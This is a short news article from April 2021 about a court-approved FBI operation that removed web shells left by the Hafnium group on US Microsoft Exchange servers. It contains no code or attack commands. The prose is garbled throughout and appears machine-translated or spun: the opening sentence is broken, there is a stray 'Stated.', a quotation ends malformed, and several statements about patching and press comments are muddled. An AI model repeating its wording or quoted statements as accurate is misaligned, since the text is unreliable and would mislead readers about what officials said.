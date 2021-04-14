



A court in Houston said a backdoor from hundreds of Microsoft Exchange email servers in the United States months after a hacker attacked thousands of networks using four previously undiscovered vulnerabilities. Approved FBI operation to “copy and delete”.

The Justice Department announced the operation on Tuesday, saying it was “successful.”

In March, Microsoft discovered that a new Chinese state-sponsored hacking group, Hafnium, was targeting Exchange servers running from the corporate network. A chain of four vulnerabilities allowed a hacker to break into a vulnerable Exchange server and steal its content. Microsoft fixed the vulnerability, but the patch did not close the backdoor from the already compromised server. Within a few days, other hacking groups began attacking vulnerable servers with the same flaws to deploy ransomware.

When the patch was applied, the number of infected servers decreased. However, the Department of Justice said in a statement that it was difficult to find and eliminate backdoors, leaving hundreds of Exchange servers vulnerable.

“This operation removed one early hacking group that left behind a web shell that could have been used to maintain and escalate persistent unauthorized access to the U.S. network,” the statement said. Stated. “The FBI performed the delete by issuing a command to the server through the web shell. It is designed so that the server deletes only the web shell (identified by a unique file path). . “

The FBI said it was trying to notify the owner via email on the server that removed the backdoor.

Attorney General John C. Demers said the operation “shows the ministry’s efforts to thwart hacking activities using all legal means, not just prosecution.”

The Department of Justice also said that the operation only removes the backdoor and does not patch the vulnerabilities exploited by hackers to remove the leftover malware from scratch.

This is believed to be the first known case of the FBI to effectively clean up private networks after a cyberattack. In 2016, the Supreme Court moved to allow US judges to issue investigation and seizure warrants outside the district. Critics opposed the move at the time and feared that the FBI could require friendly courts to operate cyber operations permitted anywhere in the world.

In other countries like France, they used to hijack botnets with similar permissions and shut them down remotely.

Neither the FBI nor the Department of Justice commented at the press conference.

